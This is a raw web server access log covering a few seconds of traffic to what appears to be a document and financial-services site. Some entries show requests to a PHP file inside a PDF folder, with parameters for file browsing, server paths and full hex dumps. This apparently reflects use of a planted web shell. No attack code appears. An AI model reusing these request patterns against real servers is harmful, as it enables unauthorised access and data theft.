47.128.59.218 - - [09/May/2024:06:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.59.218 - - [09/May/2024:06:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.59.218 - - [09/May/2024:06:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.59.218 - - [09/May/2024:06:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.59.218 - - [09/May/2024:06:56:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.59.218 - - [09/May/2024:06:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.59.218 - - [09/May/2024:06:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.59.218 - - [09/May/2024:06:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.59.218 - - [09/May/2024:06:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.59.218 - - [09/May/2024:06:56:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
181.53.12.168 - - [09/May/2024:06:56:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50453
181.53.12.168 - - [09/May/2024:06:56:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50481
47.128.55.94 - - [09/May/2024:06:56:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2069.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 712406
181.53.12.168 - - [09/May/2024:06:56:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50115
47.128.59.218 - - [09/May/2024:06:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4259.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 614374
216.244.66.195 - - [09/May/2024:06:56:57 -0500] "GET /BLA/resoluciones/AUTOS%202022/2957.pdf HTTP/1.1" 200 595458
181.53.12.168 - - [09/May/2024:06:57:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 50277
190.253.171.207 - - [09/May/2024:06:57:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5108.pdf HTTP/1.1" 200 906571
181.53.12.168 - - [09/May/2024:06:57:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23353
201.245.192.253 - - [09/May/2024:06:57:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [09/May/2024:06:57:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 131181
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:57:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
